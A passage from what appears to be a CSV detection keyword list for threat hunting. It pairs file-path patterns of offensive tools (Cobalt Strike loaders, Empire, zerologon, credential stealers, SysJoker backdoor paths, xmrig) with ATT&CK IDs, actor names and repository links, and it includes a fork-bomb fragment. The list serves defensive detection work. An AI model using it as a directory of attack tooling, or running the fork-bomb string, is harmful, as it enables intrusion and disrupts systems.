cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/wordlists/owa_directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/wordlists/skype-directories.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/workflow/test/dirbscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/wpaf/finder.py*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" +"*/wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/WSPCoerce.git*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*/wwlib/lolbins/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*/www/exploit.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" +"*/x0rz/*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x0rz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/x11-access.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/x64_slim.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/xan7r/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*/xar-1.5.2.tar.gz*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xen-mimi.ps1*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*/xml_attack.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xml_attacks.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xmlrpc-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xmpp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xmpp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xmrig.git*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*/xndpxs/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/xndpxs/CVE-2022-0847","1","1","N/A","N/A","1","8","7","2022-03-07T17:59:12Z","2022-03-07T17:51:02Z" +"*/xor/stager.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*/xor/xor.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*/XOR_b64_encrypted/*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*/XorObfuscation.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/xpath_injection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xPipe/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*/xss_robertux.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/xxe_fuzz.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/yanghaoi/_CNA*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/ysoserial/*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/zerologon.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" +"*/zerologon.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/zhzyker/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/zhzyker/CVE-2020-5902/","1","0","N/A","N/A","1","13","8","2020-07-08T04:10:12Z","2020-07-08T04:02:07Z" +"*/zsh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/zwjjustdoit/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0002 - TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/zwjjustdoit/cve-2022-23131","1","1","N/A","N/A","1","0","3","2022-02-21T04:55:57Z","2022-02-21T02:42:23Z" +"*:(){:I: &I*","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation Tools","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*:\ProgramData\RecoverySystem\recoveryWindows.zip*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\ProgramData\SystemData\igfxCUIService.exe*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\ProgramData\SystemData\tempo1.txt*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\ProgramData\SystemData\tempo2.txt*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*:\Users\Public\Music\*.dll*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*:'123pentest'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - 